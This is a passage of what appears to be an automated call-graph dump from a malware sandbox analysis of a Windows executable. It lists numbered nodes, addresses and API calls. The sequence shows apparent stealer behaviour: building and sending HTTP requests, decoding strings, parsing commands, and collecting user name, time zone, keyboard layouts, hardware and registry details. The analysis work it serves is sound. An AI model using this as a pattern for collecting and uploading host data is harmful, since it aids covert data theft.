58259->58260 58261 fe4d5b InternetConnectA 58260->58261 58261->58225 58262 fe4d89 HttpOpenRequestA 58261->58262 58263 fe517a InternetCloseHandle 58262->58263 58264 fe4dc9 58262->58264 58263->58225 58265 fe4ded 58264->58265 58266 fe4dd1 InternetSetOptionA 58264->58266 58267 ff082c 3 API calls 58265->58267 58266->58265 58268 fe4e03 58267->58268 58269 ff07b0 lstrcpyA 58268->58269 58270 fe4e0e 58269->58270 58271 ff07ea 2 API calls 58270->58271 58272 fe4e30 58271->58272 58273 ff07b0 lstrcpyA 58272->58273 58274 fe4e3b 58273->58274 58275 ff082c 3 API calls 58274->58275 58276 fe4e5c 58275->58276 58277 ff07b0 lstrcpyA 58276->58277 58278 fe4e67 58277->58278 58279 ff082c 3 API calls 58278->58279 58280 fe4e89 58279->58280 58281 ff07b0 lstrcpyA 58280->58281 58282 fe4e94 58281->58282 58283 ff082c 3 API calls 58282->58283 58284 fe4eb5 58283->58284 58285 ff07b0 lstrcpyA 58284->58285 58286 fe4ec0 58285->58286 58287 ff082c 3 API calls 58286->58287 58288 fe4ee1 58287->58288 58289 ff07b0 lstrcpyA 58288->58289 58290 fe4eec 58289->58290 58291 ff07ea 2 API calls 58290->58291 58292 fe4f0b 58291->58292 58293 ff07b0 lstrcpyA 58292->58293 58294 fe4f16 58293->58294 58295 ff082c 3 API calls 58294->58295 58296 fe4f37 58295->58296 58297 ff07b0 lstrcpyA 58296->58297 58298 fe4f42 58297->58298 58299 ff082c 3 API calls 58298->58299 58300 fe4f63 58299->58300 58301 ff07b0 lstrcpyA 58300->58301 58302 fe4f6e 58301->58302 58303 ff07ea 2 API calls 58302->58303 58304 fe4f90 58303->58304 58305 ff07b0 lstrcpyA 58304->58305 58306 fe4f9b 58305->58306 58307 ff082c 3 API calls 58306->58307 58308 fe4fbc 58307->58308 58309 ff07b0 lstrcpyA 58308->58309 58310 fe4fc7 58309->58310 58311 ff082c 3 API calls 58310->58311 58312 fe4fe9 58311->58312 58313 ff07b0 lstrcpyA 58312->58313 58314 fe4ff4 58313->58314 58315 ff082c 3 API calls 58314->58315 58316 fe5015 58315->58316 58317 ff07b0 lstrcpyA 58316->58317 58318 fe5020 58317->58318 58319 ff082c 3 API calls 58318->58319 58320 fe5041 58319->58320 58321 ff07b0 lstrcpyA 58320->58321 58322 fe504c 58321->58322 58323 ff07ea 2 API calls 58322->58323 58324 fe506b 58323->58324 58325 ff07b0 lstrcpyA 58324->58325 58326 fe5076 58325->58326 58327 ff070a lstrcpyA 58326->58327 58328 fe5091 58327->58328 58329 ff07ea 2 API calls 58328->58329 58330 fe50a8 58329->58330 58331 ff07ea 2 API calls 58330->58331 58332 fe50b9 58331->58332 58333 ff07b0 lstrcpyA 58332->58333 58334 fe50c4 58333->58334 58335 fe50da lstrlenA lstrlenA HttpSendRequestA 58334->58335 58336 fe514e InternetReadFile 58335->58336 58337 fe5168 InternetCloseHandle 58336->58337 58340 fe510e 58336->58340 58338 fe2910 58337->58338 58338->58263 58339 ff082c 3 API calls 58339->58340 58340->58336 58340->58337 58340->58339 58341 ff07b0 lstrcpyA 58340->58341 58341->58340 58343 ff3bbe ExitProcess 58342->58343 58344 ff3bc5 strtok_s 58342->58344 58346 ff3d25 58344->58346 58357 ff3be1 58344->58357 58345 ff3d07 strtok_s 58345->58346 58345->58357 58346->57343 58347 ff3bfe StrCmpCA 58347->58345 58347->58357 58348 ff3c7c StrCmpCA 58348->58345 58348->58357 58349 ff3cbb StrCmpCA 58349->58345 58350 ff3c1a StrCmpCA 58350->58345 58350->58357 58351 ff3c36 StrCmpCA 58351->58345 58351->58357 58352 ff3ca6 StrCmpCA 58352->58345 58352->58357 58353 ff3cf3 StrCmpCA 58353->58345 58354 ff3c52 StrCmpCA 58354->58345 58354->58357 58355 ff3c91 StrCmpCA 58355->58345 58355->58357 58356 ff3cd1 StrCmpCA 58356->58345 58357->58345 58357->58347 58357->58348 58357->58349 58357->58350 58357->58351 58357->58352 58357->58353 58357->58354 58357->58355 58357->58356 58358 ff076c 2 API calls 58357->58358 58358->58357 58360 ff073c lstrcpyA 58359->58360 58361 fe5f56 58360->58361 58362 fe4aa7 5 API calls 58361->58362 58363 fe5f62 58362->58363 58364 ff070a lstrcpyA 58363->58364 58365 fe5f7e 58364->58365 58366 ff070a lstrcpyA 58365->58366 58367 fe5f8e 58366->58367 58368 ff070a lstrcpyA 58367->58368 58369 fe5f9e 58368->58369 58370 ff070a lstrcpyA 58369->58370 58371 fe5fae 58370->58371 58372 ff070a lstrcpyA 58371->58372 58373 fe5fbe InternetOpenA StrCmpCA 58372->58373 58374 fe5ff2 58373->58374 58375 fe6004 58374->58375 58376 fe66f1 InternetCloseHandle 58374->58376 58378 ff1e6d 7 API calls 58375->58378 59093 fe8696 CryptStringToBinaryA 58376->59093 58380 fe6012 58378->58380 58381 ff07ea 2 API calls 58380->58381 58383 fe6025 58381->58383 58382 ff076c 2 API calls 58384 fe672b 58382->58384 58385 ff07b0 lstrcpyA 58383->58385 58386 ff082c 3 API calls 58384->58386 58389 fe6030 58385->58389 58387 fe6742 58386->58387 58388 ff07b0 lstrcpyA 58387->58388 58394 fe674d 58388->58394 58390 ff082c 3 API calls 58389->58390 58391 fe605c 58390->58391 58392 ff07b0 lstrcpyA 58391->58392 58393 fe6067 58392->58393 58396 ff082c 3 API calls 58393->58396 58395 ffcab4 ___init_ctype 5 API calls 58394->58395 58397 fe67dd 58395->58397 58398 fe6088 58396->58398 58527 ff3603 strtok_s 58397->58527 58399 ff07b0 lstrcpyA 58398->58399 58400 fe6093 58399->58400 58401 ff07ea 2 API calls 58400->58401 58402 fe60b5 58401->58402 58403 ff07b0 lstrcpyA 58402->58403 58404 fe60c0 58403->58404 58405 ff082c 3 API calls 58404->58405 58406 fe60e1 58405->58406 58407 ff07b0 lstrcpyA 58406->58407 58408 fe60ec 58407->58408 58409 ff082c 3 API calls 58408->58409 58410 fe610d 58409->58410 58411 ff07b0 lstrcpyA 58410->58411 58412 fe6118 58411->58412 58413 ff082c 3 API calls 58412->58413 58414 fe613a 58413->58414 58415 ff07ea 2 API calls 58414->58415 58416 fe6145 58415->58416 58417 ff07b0 lstrcpyA 58416->58417 58418 fe6150 58417->58418 58419 fe6166 InternetConnectA 58418->58419 58419->58376 58420 fe6194 HttpOpenRequestA 58419->58420 58421 fe61d4 58420->58421 58422 fe66e5 InternetCloseHandle 58420->58422 58423 fe61dc InternetSetOptionA 58421->58423 58424 fe61f8 58421->58424 58422->58376 58423->58424 58425 ff082c 3 API calls 58424->58425 58426 fe620e 58425->58426 58427 ff07b0 lstrcpyA 58426->58427 58428 fe6219 58427->58428 58429 ff07ea 2 API calls 58428->58429 58430 fe623b 58429->58430 58431 ff07b0 lstrcpyA 58430->58431 58432 fe6246 58431->58432 58433 ff082c 3 API calls 58432->58433 58434 fe6267 58433->58434 58435 ff07b0 lstrcpyA 58434->58435 58436 fe6272 58435->58436 58437 ff082c 3 API calls 58436->58437 58438 fe6294 58437->58438 58439 ff07b0 lstrcpyA 58438->58439 58440 fe629f 58439->58440 58441 ff082c 3 API calls 58440->58441 58442 fe62c1 58441->58442 58443 ff07b0 lstrcpyA 58442->58443 58444 fe62cc 58443->58444 58445 ff082c 3 API calls 58444->58445 58446 fe62ed 58445->58446 58447 ff07b0 lstrcpyA 58446->58447 58448 fe62f8 58447->58448 58449 ff07ea 2 API calls 58448->58449 58450 fe6317 58449->58450 58451 ff07b0 lstrcpyA 58450->58451 58452 fe6322 58451->58452 58453 ff082c 3 API calls 58452->58453 58454 fe6343 58453->58454 58455 ff07b0 lstrcpyA 58454->58455 58456 fe634e 58455->58456 58457 ff082c 3 API calls 58456->58457 58458 fe636f 58457->58458 58459 ff07b0 lstrcpyA 58458->58459 58460 fe637a 58459->58460 58461 ff07ea 2 API calls 58460->58461 58462 fe639c 58461->58462 58463 ff07b0 lstrcpyA 58462->58463 58464 fe63a7 58463->58464 58465 ff082c 3 API calls 58464->58465 58466 fe63c8 58465->58466 58467 ff07b0 lstrcpyA 58466->58467 58468 fe63d3 58467->58468 58469 ff082c 3 API calls 58468->58469 58470 fe63f5 58469->58470 58471 ff07b0 lstrcpyA 58470->58471 58472 fe6400 58471->58472 58473 ff082c 3 API calls 58472->58473 58474 fe6421 58473->58474 58475 ff07b0 lstrcpyA 58474->58475 58476 fe642c 58475->58476 58477 ff082c 3 API calls 58476->58477 58478 fe644d 58477->58478 58479 ff07b0 lstrcpyA 58478->58479 58480 fe6458 58479->58480 58481 ff082c 3 API calls 58480->58481 58482 fe6479 58481->58482 58483 ff07b0 lstrcpyA 58482->58483 58484 fe6484 58483->58484 58485 ff082c 3 API calls 58484->58485 58486 fe64a5 58485->58486 58487 ff07b0 lstrcpyA 58486->58487 58488 fe64b0 58487->58488 58489 ff082c 3 API calls 58488->58489 58490 fe64d1 58489->58490 58491 ff07b0 lstrcpyA 58490->58491 58492 fe64dc 58491->58492 58493 ff07ea 2 API calls 58492->58493 58494 fe64f8 58493->58494 58495 ff07b0 lstrcpyA 58494->58495 58496 fe6503 58495->58496 58497 ff082c 3 API calls 58496->58497 58498 fe6524 58497->58498 58499 ff07b0 lstrcpyA 58498->58499 58500 fe652f 58499->58500 58501 ff082c 3 API calls 58500->58501 58502 fe6551 58501->58502 58503 ff07b0 lstrcpyA 58502->58503 58504 fe655c 58503->58504 58505 ff082c 3 API calls 58504->58505 58506 fe657d 58505->58506 58507 ff07b0 lstrcpyA 58506->58507 58508 fe6588 58507->58508 58509 ff082c 3 API calls 58508->58509 58510 fe65a9 58509->58510 58511 ff07b0 lstrcpyA 58510->58511 58512 fe65b4 58511->58512 58513 ff07ea 2 API calls 58512->58513 58514 fe65d3 58513->58514 58515 ff07b0 lstrcpyA 58514->58515 58516 fe65de 58515->58516 58517 fe65e9 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 58516->58517 59098 1006af0 58517->59098 58519 fe6630 lstrlenA lstrlenA 59099 1006af0 58519->59099 58521 fe6659 lstrlenA HttpSendRequestA 58522 fe66c4 InternetReadFile 58521->58522 58523 fe66de InternetCloseHandle 58522->58523 58525 fe6684 58522->58525 58523->58422 58524 ff082c 3 API calls 58524->58525 58525->58522 58525->58523 58525->58524 58526 ff07b0 lstrcpyA 58525->58526 58526->58525 58528 ff362f 58527->58528 58529 ff36aa 58527->58529 58530 ff076c 2 API calls 58528->58530 58531 ff3690 strtok_s 58528->58531 58532 ff076c 2 API calls 58528->58532 58529->57351 58530->58531 58531->58528 58531->58529 58532->58528 58539 ff344a 58533->58539 58534 ff3549 58534->57359 58535 ff34f6 StrCmpCA 58535->58539 58536 ff076c 2 API calls 58536->58539 58537 ff352b strtok_s 58537->58539 58538 ff34c5 StrCmpCA 58538->58539 58539->58534 58539->58535 58539->58536 58539->58537 58539->58538 58540 ff34a0 StrCmpCA 58539->58540 58541 ff346f StrCmpCA 58539->58541 58540->58539 58541->58539 58543 ff35f8 58542->58543 58544 ff3580 58542->58544 58543->57367 58545 ff35a6 StrCmpCA 58544->58545 58546 ff076c 2 API calls 58544->58546 58547 ff35de strtok_s 58544->58547 58548 ff076c 2 API calls 58544->58548 58545->58544 58546->58547 58547->58543 58547->58544 58548->58544 58550 ff070a lstrcpyA 58549->58550 58551 ff3d7c 58550->58551 58552 ff082c 3 API calls 58551->58552 58553 ff3d8c 58552->58553 58554 ff07b0 lstrcpyA 58553->58554 58555 ff3d94 58554->58555 58556 ff082c 3 API calls 58555->58556 58557 ff3dac 58556->58557 58558 ff07b0 lstrcpyA 58557->58558 58559 ff3db4 58558->58559 58560 ff082c 3 API calls 58559->58560 58561 ff3dcc 58560->58561 58562 ff07b0 lstrcpyA 58561->58562 58563 ff3dd4 58562->58563 58564 ff082c 3 API calls 58563->58564 58565 ff3dec 58564->58565 58566 ff07b0 lstrcpyA 58565->58566 58567 ff3df4 58566->58567 58568 ff082c 3 API calls 58567->58568 58569 ff3e0c 58568->58569 58570 ff07b0 lstrcpyA 58569->58570 58571 ff3e14 58570->58571 59100 ff0ee3 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 58571->59100 58574 ff082c 3 API calls 58575 ff3e2d 58574->58575 58576 ff07b0 lstrcpyA 58575->58576 58577 ff3e35 58576->58577 58578 ff082c 3 API calls 58577->58578 58579 ff3e4d 58578->58579 58580 ff07b0 lstrcpyA 58579->58580 58581 ff3e55 58580->58581 58582 ff082c 3 API calls 58581->58582 58583 ff3e6d 58582->58583 58584 ff07b0 lstrcpyA 58583->58584 58585 ff3e75 58584->58585 59103 ff17f7 58585->59103 58588 ff082c 3 API calls 58589 ff3e8e 58588->58589 58590 ff07b0 lstrcpyA 58589->58590 58591 ff3e96 58590->58591 58592 ff082c 3 API calls 58591->58592 58593 ff3eae 58592->58593 58594 ff07b0 lstrcpyA 58593->58594 58595 ff3eb6 58594->58595 58596 ff082c 3 API calls 58595->58596 58597 ff3ece 58596->58597 58598 ff07b0 lstrcpyA 58597->58598 58599 ff3ed6 58598->58599 58600 ff18a7 11 API calls 58599->58600 58601 ff3ee6 58600->58601 58602 ff07ea 2 API calls 58601->58602 58603 ff3ef3 58602->58603 58604 ff07b0 lstrcpyA 58603->58604 58605 ff3efb 58604->58605 58606 ff082c 3 API calls 58605->58606 58607 ff3f1b 58606->58607 58608 ff07b0 lstrcpyA 58607->58608 58609 ff3f23 58608->58609 58610 ff082c 3 API calls 58609->58610 58611 ff3f3b 58610->58611 58612 ff07b0 lstrcpyA 58611->58612 58613 ff3f43 58612->58613 58614 ff0bc5 19 API calls 58613->58614 58615 ff3f53 58614->58615 58616 ff07ea 2 API calls 58615->58616 58617 ff3f60 58616->58617 58618 ff07b0 lstrcpyA 58617->58618 58619 ff3f68 58618->58619 58620 ff082c 3 API calls 58619->58620 58621 ff3f88 58620->58621 58622 ff07b0 lstrcpyA 58621->58622 58623 ff3f90 58622->58623 58624 ff082c 3 API calls 58623->58624 58625 ff3fa8 58624->58625 58626 ff07b0 lstrcpyA 58625->58626 58627 ff3fb0 58626->58627 58628 ff3fb8 GetCurrentProcessId 58627->58628 59110 ff246d OpenProcess 58628->59110 58631 ff07ea 2 API calls 58632 ff3fd5 58631->58632 58633 ff07b0 lstrcpyA 58632->58633 58634 ff3fdd 58633->58634 58635 ff082c 3 API calls 58634->58635 58636 ff3ffd 58635->58636 58637 ff07b0 lstrcpyA 58636->58637 58638 ff4005 58637->58638 58639 ff082c 3 API calls 58638->58639 58640 ff401d 58639->58640 58641 ff07b0 lstrcpyA 58640->58641 58642 ff4025 58641->58642 58643 ff082c 3 API calls 58642->58643 58644 ff403d 58643->58644 58645 ff07b0 lstrcpyA 58644->58645 58646 ff4045 58645->58646 58647 ff082c 3 API calls 58646->58647 58648 ff405d 58647->58648 58649 ff07b0 lstrcpyA 58648->58649 58650 ff4065 58649->58650 59117 ff0d53 GetProcessHeap HeapAlloc 58650->59117 58653 ff082c 3 API calls 58654 ff407e 58653->58654 58655 ff07b0 lstrcpyA 58654->58655 58656 ff4086 58655->58656 58657 ff082c 3 API calls 58656->58657 58658 ff409e 58657->58658 58659 ff07b0 lstrcpyA 58658->58659 58660 ff40a6 58659->58660 58661 ff082c 3 API calls 58660->58661 58662 ff40be 58661->58662 58663 ff07b0 lstrcpyA 58662->58663 58664 ff40c6 58663->58664 59124 ff1a2a 58664->59124 58667 ff07ea 2 API calls 58668 ff40e3 58667->58668 58669 ff07b0 lstrcpyA 58668->58669 58670 ff40eb 58669->58670 58671 ff082c 3 API calls 58670->58671 58672 ff410b 58671->58672 58673 ff07b0 lstrcpyA 58672->58673 58674 ff4113 58673->58674 58675 ff082c 3 API calls 58674->58675 58676 ff412b 58675->58676 58677 ff07b0 lstrcpyA 58676->58677 58678 ff4133 58677->58678 59141 ff1bba 58678->59141 58680 ff4144 58681 ff07ea 2 API calls 58680->58681 58682 ff4152 58681->58682 58683 ff07b0 lstrcpyA 58682->58683 58684 ff415a 58683->58684 58685 ff082c 3 API calls 58684->58685 58686 ff417a 58685->58686 58687 ff07b0 lstrcpyA 58686->58687 58688 ff4182 58687->58688 58689 ff082c 3 API calls 58688->58689 58690 ff419a 58689->58690 58691 ff07b0 lstrcpyA 58690->58691 58692 ff41a2 58691->58692 58693 ff0ea8 3 API calls 58692->58693 58694 ff41af 58693->58694 58695 ff082c 3 API calls 58694->58695 58696 ff41bb 58695->58696 58697 ff07b0 lstrcpyA 58696->58697 58698 ff41c3 58697->58698 58699 ff082c 3 API calls 58698->58699 58700 ff41db 58699->58700 58701 ff07b0 lstrcpyA 58700->58701 58702 ff41e3 58701->58702 58703 ff082c 3 API calls 58702->58703 58704 ff41fb 58703->58704 58705 ff07b0 lstrcpyA 58704->58705 58706 ff4203 58705->58706 59156 ff0e76 GetProcessHeap HeapAlloc GetUserNameA 58706->59156 58708 ff4210 58709 ff082c 3 API calls 58708->58709 58710 ff421c 58709->58710 58711 ff07b0 lstrcpyA 58710->58711 58712 ff4224 58711->58712 58713 ff082c 3 API calls 58712->58713 58714 ff423c 58713->58714 58715 ff07b0 lstrcpyA 58714->58715 58716 ff4244 58715->58716 58717 ff082c 3 API calls 58716->58717 58718 ff425c 58717->58718 58719 ff07b0 lstrcpyA 58718->58719 58720 ff4264 58719->58720 59157 ff1786 7 API calls 58720->59157 58723 ff07ea 2 API calls 58724 ff4283 58723->58724 58725 ff07b0 lstrcpyA 58724->58725 58726 ff428b 58725->58726 58727 ff082c 3 API calls 58726->58727 58728 ff42ab 58727->58728 58729 ff07b0 lstrcpyA 58728->58729 58730 ff42b3 58729->58730 58731 ff082c 3 API calls 58730->58731 58732 ff42cb 58731->58732 58733 ff07b0 lstrcpyA 58732->58733 58734 ff42d3 58733->58734 59160 ff0ffe 58734->59160 58737 ff07ea 2 API calls 58738 ff42f0 58737->58738 58739 ff07b0 lstrcpyA 58738->58739 58740 ff42f8 58739->58740 58741 ff082c 3 API calls 58740->58741 58742 ff4318 58741->58742 58743 ff07b0 lstrcpyA 58742->58743 58744 ff4320 58743->58744 58745 ff082c 3 API calls 58744->58745 58746 ff4338 58745->58746 58747 ff07b0 lstrcpyA 58746->58747 58748 ff4340 58747->58748 58749 ff0ee3 9 API calls 58748->58749 58750 ff434d 58749->58750 58751 ff082c 3 API calls 58750->58751 58752 ff4359 58751->58752 58753 ff07b0 lstrcpyA 58752->58753 58754 ff4361 58753->58754 58755 ff082c 3 API calls 58754->58755 58756 ff4379 58755->58756 58757 ff07b0 lstrcpyA 58756->58757 58758 ff4381 58757->58758 58759 ff082c 3 API calls 58758->58759 58760 ff4399 58759->58760 58761 ff07b0 lstrcpyA 58760->58761 58762 ff43a1 58761->58762 59172 ff0f51 GetProcessHeap HeapAlloc GetTimeZoneInformation 58762->59172 58765 ff082c 3 API calls 58766 ff43ba 58765->58766 58767 ff07b0 lstrcpyA 58766->58767 58768 ff43c2 58767->58768 58769 ff082c 3 API calls 58768->58769 58770 ff43da 58769->58770 58771 ff07b0 lstrcpyA 58770->58771 58772 ff43e2 58771->58772 58773 ff082c 3 API calls 58772->58773 58774 ff43fa 58773->58774 58775 ff07b0 lstrcpyA 58774->58775 58776 ff4402 58775->58776 58777 ff082c 3 API calls 58776->58777 58778 ff441a 58777->58778 58779 ff07b0 lstrcpyA 58778->58779 58780 ff4422 58779->58780 59177 ff1174 GetProcessHeap HeapAlloc RegOpenKeyExA 58780->59177 58782 ff442f 58783 ff082c 3 API calls 58782->58783 58784 ff443b 58783->58784 58785 ff07b0 lstrcpyA 58784->58785 58786 ff4443 58785->58786 58787 ff082c 3 API calls 58786->58787 58788 ff445b 58787->58788 58789 ff07b0 lstrcpyA 58788->58789 58790 ff4463 58789->58790 58791 ff082c 3 API calls 58790->58791 58792 ff447b 58791->58792 58793 ff07b0 lstrcpyA 58792->58793 58794 ff4483 58793->58794 59180 ff122a 58794->59180 58797 ff082c 3 API calls 58798 ff449c 58797->58798 58799 ff07b0 lstrcpyA 58798->58799 58800 ff44a4 58799->58800 58801 ff082c 3 API calls 58800->58801 58802 ff44bc 58801->58802 58803 ff07b0 lstrcpyA 58802->58803 58804 ff44c4 58803->58804 58805 ff082c 3 API calls 58804->58805 58806 ff44dc 58805->58806 58807 ff07b0 lstrcpyA 58806->58807 58808 ff44e4 58807->58808 59197 ff11dd GetSystemInfo wsprintfA 58808->59197 58811 ff082c 3 API calls 58812 ff44fd 58811->58812 58813 ff07b0 lstrcpyA 58812->58813 58814 ff4505 58813->58814 58815 ff082c 3 API calls 58814->58815 58816 ff451d 58815->58816 58817 ff07b0 lstrcpyA 58816->58817 58818 ff4525 58817->58818 58819 ff082c 3 API calls 58818->58819 58820 ff453d 58819->58820 58821 ff07b0 lstrcpyA 58820->58821 58822 ff4545 58821->58822 59200 ff133c GetProcessHeap HeapAlloc 58822->59200 58825 ff082c 3 API calls 58826 ff455e 58825->58826 58827 ff07b0 lstrcpyA 58826->58827 58828 ff4566 58827->58828 58829 ff082c 3 API calls 58828->58829 58830 ff4581 58829->58830 58831 ff07b0 lstrcpyA 58830->58831 58832 ff4589 58831->58832 58833 ff082c 3 API calls 58832->58833 58834 ff45a4 58833->58834 58835 ff07b0 lstrcpyA 58834->58835 58836 ff45ac 58835->58836 59207 ff13b5 58836->59207 58839 ff07ea 2 API calls 58840 ff45cc 58839->58840 58841 ff07b0 lstrcpyA 58840->58841 58842 ff45d4 58841->58842 58843 ff082c 3 API calls 58842->58843 58844 ff45f7 58843->58844 58845 ff07b0 lstrcpyA 58844->58845 58846 ff45ff 58845->58846 58847 ff082c 3 API calls 58846->58847 58848 ff4617 58847->58848 58849 ff07b0 lstrcpyA 58848->58849 58850 ff461f 58849->58850 59214 ff16c8 58850->59214 58853 ff07ea 2 API calls 58854 ff463f 58853->58854 58855 ff07b0 lstrcpyA 58854->58855 58856 ff4647 58855->58856 58857 ff082c 3 API calls 58856->58857 58858 ff466d 58857->58858 58859 ff07b0 lstrcpyA 58858->58859 58860 ff4675 58859->58860 58861 ff082c 3 API calls 58860->58861 58862 ff4690 58861->58862 58863 ff07b0 lstrcpyA 58862->58863 58864 ff4698 58863->58864 59224 ff1426 58864->59224 58867 ff07ea 2 API calls 58868 ff46bd 58867->58868 58869 ff07b0 lstrcpyA 58868->58869 58870 ff46c5 58869->58870 58871 ff1426 21 API calls 58870->58871 58872 ff46e6 58871->58872 58873 ff07ea 2 API calls 58872->58873 58874 ff46f5 58873->58874 58875 ff07b0 lstrcpyA 58874->58875 58876 ff46fd 58875->58876 58877 ff082c 3 API calls 58876->58877 58878 ff4720 58877->58878 58879 ff07b0 lstrcpyA 58878->58879 58880 ff4728 58879->58880 58881 fe1ced lstrcpyA 58880->58881 58882 ff473d lstrlenA 58881->58882 58883 ff070a lstrcpyA 58882->58883 58884 ff475a 58883->58884 59244 ff7074 58884->59244 58886 ff4763 58886->57371 58888 ff073c lstrcpyA 58887->58888 58889 fe524c 58888->58889 58890 fe4aa7 5 API calls 58889->58890 58891 fe5258 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 58890->58891 58892 fe52bd 58891->58892 58893 fe543d InternetCloseHandle 58892->58893 58894 fe52cb InternetConnectA 58892->58894 58901 fe5451 58893->58901 58895 fe52f7 HttpOpenRequestA 58894->58895 58896 fe5431 InternetCloseHandle 58894->58896 58897 fe5338 58895->58897 58898 fe5425 InternetCloseHandle 58895->58898 58896->58893 58899 fe533c InternetSetOptionA 58897->58899 58900 fe5358 HttpSendRequestA HttpQueryInfoA 58897->58900 58898->58896 58899->58900 58903 fe5390 58900->58903 58906 fe53ad 58900->58906 58902 ffcab4 ___init_ctype 5 API calls 58901->58902 58904 fe5472 58902->58904 58903->58901 58904->57378 58905 fe53b3 InternetReadFile 58905->58898 58905->58906 58906->58898 58906->58905 58906->58906 59304 fe84e1 58907->59304 58909 feec87 58910 ff070a lstrcpyA 58909->58910 58911 feeca2 58910->58911 59307 ff2818 CreateFileA 58911->59307 58913 feeca7 59311 fe859f LoadLibraryA 58913->59311 58915 feeeac 58916 fe1ced lstrcpyA 58915->58916 58918 feeeb9 58916->58918 58917 feecc9 StrCmpCA 58919 feed40 StrCmpCA 58917->58919 58942 feecaf 58917->58942 59316 fee33a 58918->59316 58921 feee36 StrCmpCA 58919->58921 58919->58942 58921->58942 58923 ff070a lstrcpyA 58923->58942 58924 fe1ced lstrcpyA 58926 feeec5 58924->58926 58925 fe1ced lstrcpyA 58925->58942 59361 fee883 58926->59361 58927 ff082c lstrlenA lstrcpyA lstrcatA 58927->58942 58929 ff07ea 2 API calls 58929->58942 58934 ff073c lstrcpyA 58934->58942 58935 ff07b0 lstrcpyA 58935->58942 58942->58915 58942->58917 58942->58919 58942->58921 58942->58923 58942->58925 58942->58927 58942->58929 58942->58934 58942->58935 59432 fec8b4 310 API calls 58942->59432 59433 fecac6 311 API calls 58942->59433 59434 fedb5e 226 API calls 58942->59434 59049 ff070a lstrcpyA 59048->59049 59050 fe29f5 59049->59050 59050->58140 59052 ff070a lstrcpyA 59051->59052 59053 fe2a06 59052->59053 59053->58140 59055 ff070a lstrcpyA 59054->59055 59056 fe2a28 59055->59056 59056->58140 59058 ff070a lstrcpyA 59057->59058 59059 fe2a39 59058->59059 59059->58140 59061 ff073c lstrcpyA 59060->59061 59062 ff6f89 59061->59062 59063 ff073c lstrcpyA 59062->59063 59064 ff6f94 59063->59064 59065 ff073c lstrcpyA 59064->59065 59066 ff6f9f 59065->59066 59066->58178 59067->58140 59068->58140 59070 ff195f 59069->59070 59071 ff18d0 59069->59071 59072 ff070a lstrcpyA 59070->59072 59073 ff070a lstrcpyA 59071->59073 59074 ff196b 59072->59074 59077 ff18e3 _memset 59073->59077 59075 ffcab4 ___init_ctype 5 API calls 59074->59075 59076 ff1978 59075->59076 59076->58199 59086 ff27a7 lstrcpyA malloc strncpy 59077->59086 59079 ff190d lstrcatA 59087 fe2910 59079->59087 59081 ff192a lstrcatA 59082 ff1947 59081->59082 59083 ff070a lstrcpyA 59082->59083 59084 ff1955 59083->59084 59084->59074 59085->58202 59086->59079 59088 fe2914 59087->59088 59088->59081 59090 fe4ab5 59089->59090 59090->59090 59091 fe4abc ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 59090->59091 59092 fe4b18 59091->59092 59092->58212 59094 fe86b8 LocalAlloc 59093->59094 59095 fe6716 59093->59095 59094->59095 59096 fe86c8 CryptStringToBinaryA 59094->59096 59095->58382 59095->58394 59096->59095 59097 fe86df LocalFree 59096->59097 59097->59095 59098->58519 59099->58521 59101 ffcab4 ___init_ctype 5 API calls 59100->59101 59102 ff0f4f 59101->59102 59102->58574 59261 10036b0 59103->59261 59105 ff182f RegOpenKeyExA 59106 ff1874 RegCloseKey CharToOemA 59105->59106 59107 ff1853 RegQueryValueExA 59105->59107 59108 ffcab4 ___init_ctype 5 API calls 59106->59108 59107->59106 59109 ff18a5 59108->59109 59109->58588 59111 ff249b K32GetModuleFileNameExA CloseHandle 59110->59111 59112 ff24b7 59110->59112 59111->59112 59113 ff070a lstrcpyA 59112->59113 59114 ff24c3 59113->59114 59115 ffcab4 ___init_ctype 5 API calls 59114->59115 59116 ff24d1 59115->59116 59116->58631 59263 ff0e39 59117->59263 59120 ff0d7f 59120->58653 59121 ff0d86 RegOpenKeyExA 59122 ff0dbe RegCloseKey 59121->59122 59123 ff0da6 RegQueryValueExA 59121->59123 59122->59120 59123->59122 59270 100eba9 59124->59270 59126 ff1a36 CoInitializeEx CoInitializeSecurity CoCreateInstance 59127 ff1a8e 59126->59127 59128 ff1a96 CoSetProxyBlanket 59127->59128 59132 ff1b87 59127->59132 59129 ff1ac6 59128->59129 59129->59132 59135 ff1afa VariantInit 59129->59135 59130 ff070a lstrcpyA 59131 ff1bb2 59130->59131 59279 100ec05 59131->59279 59132->59130 59136 ff1b19 59135->59136 59271 ff197a 59136->59271 59138 ff1b24 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 59139 ff070a lstrcpyA 59138->59139 59140 ff1b7b VariantClear 59139->59140 59140->59131 59283 100eb3d 59141->59283 59143 ff1bc6 CoInitializeEx CoInitializeSecurity CoCreateInstance 59144 ff1c1c 59143->59144 59145 ff1c24 CoSetProxyBlanket 59144->59145 59148 ff1cb6 59144->59148 59149 ff1c54 59145->59149 59146 ff070a lstrcpyA 59147 ff1ce1 59146->59147 59147->58680 59148->59146 59149->59148 59150 ff1c7c VariantInit 59149->59150 59151 ff1c9b 59150->59151 59284 ff1f65 LocalAlloc CharToOemW 59151->59284 59153 ff1ca3 59154 ff070a lstrcpyA 59153->59154 59155 ff1caa VariantClear 59154->59155 59155->59147 59156->58708 59158 ff070a lstrcpyA 59157->59158 59159 ff17f0 59158->59159 59159->58723 59161 ff070a lstrcpyA 59160->59161 59162 ff1025 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 59161->59162 59170 ff105f 59162->59170 59171 ff1110 59162->59171 59163 ff1065 GetLocaleInfoA 59163->59170 59164 ff111c LocalFree 59165 ff1128 59164->59165 59166 ffcab4 ___init_ctype 5 API calls 59165->59166 59167 ff1138 59166->59167 59167->58737 59168 ff082c lstrlenA lstrcpyA lstrcatA 59168->59170 59169 ff07b0 lstrcpyA 59169->59170 59170->59163 59170->59168 59170->59169 59170->59171 59171->59164 59171->59165 59173 ff0f8d wsprintfA 59172->59173 59174 ff0fa9 59172->59174 59173->59174 59175 ffcab4 ___init_ctype 5 API calls 59174->59175 59176 ff0fb6 59175->59176 59176->58765 59178 ff11cf RegCloseKey 59177->59178 59179 ff11b7 RegQueryValueExA 59177->59179 59178->58782 59179->59178 59181 ff129f GetLogicalProcessorInformationEx 59180->59181 59182 ff126b GetLastError 59181->59182 59185 ff12aa 59181->59185 59183 